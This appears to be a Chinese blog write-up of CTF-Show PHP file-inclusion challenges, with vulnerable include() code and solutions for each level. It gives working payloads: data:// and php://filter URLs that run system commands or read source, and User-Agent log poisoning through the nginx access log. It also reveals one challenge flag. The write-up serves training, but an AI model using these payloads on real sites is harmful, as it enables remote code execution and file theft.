CTF-Show-文件包含系列
CTF-Show-文件包含系列
Problem 1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:52:43
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
data伪协议绕过或php伪协议绕过
直接访问:
data伪协议:http://013afa34-19ec-4bb3-8296-b5d7395e1c28.challenge.ctf.show/?file=data://text/plain,%3C?php%20echo%20system(%22tac%20flag.php%22);?%3E
php伪协议:?file=php://filter/convert.base64-encode/resource=flag.php
得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:55:11
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:55:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{4d9280cd-8ec9-4605-adf1-be02df690ff8}";
Problem 2
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:10:14
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
//过滤了php协议
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
采用data伪协议+短标签绕过
http://1806c891-e5a0-40f8-8a62-1dcd6b73e508.challenge.ctf.show/?file=data://text/plain,%3C?=system(%22tac%20fla*%22);?%3E
采用data伪协议+base64编码绕过
http://1806c891-e5a0-40f8-8a62-1dcd6b73e508.challenge.ctf.show/?file=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oInRhYyBmbGFnLnBocCIpPz4=
Problem 3
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
//过滤php,data伪协议
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
采用日志包含绕过
先从UA头中写入payload,再包含日志文件(/var/log/nginx/access.log),得到flag
我们可以先查看一下文件,从UA头中注入:
payload:<?php echo system(ls)?>
注:这里ls不能加引号,否则会报常量错误
我们发现文件名为fl0g.php
接下来进行访问,从UA头中注入:
payload:<?php echo system('tac fl0g.php')?>
得到flag
Problem 4
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
//在上一题的基础上,过滤了:号
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
依然采用日志绕过。
Problem 5
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
//在上一题的基础上过滤了点
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
总结
常用的文件包含的绕过手法:
- php伪协议
- data伪协议
- 日志包含绕过
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现